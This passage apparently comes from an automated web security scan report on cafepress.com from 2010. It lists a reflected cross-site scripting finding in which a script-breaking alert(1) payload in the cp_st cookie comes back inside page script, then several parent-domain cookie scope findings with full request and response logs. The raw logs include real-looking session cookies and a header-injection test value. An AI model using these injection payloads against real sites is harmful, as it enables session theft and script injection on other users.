GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=622eb</script><script>alert(1)</script>7a1f01045b0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 174630 Date: Sun, 26 Dec 2010 13:49:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174630 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... _us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SKGallery' window.cafepress.tealeaf.searchTerm = '622eb</script><script>alert(1)</script>7a1f01045b0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
2. Cookie scoped to parent domain
previous
next
There are 70 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
2.1. http://www.cafepress.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 75158 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Content-Length: 0 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/ tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/ cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/ cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 95181 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:44:01 GMT Connection: closeSet-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95181 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.5. http://www.cafepress.com/+aprons
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; 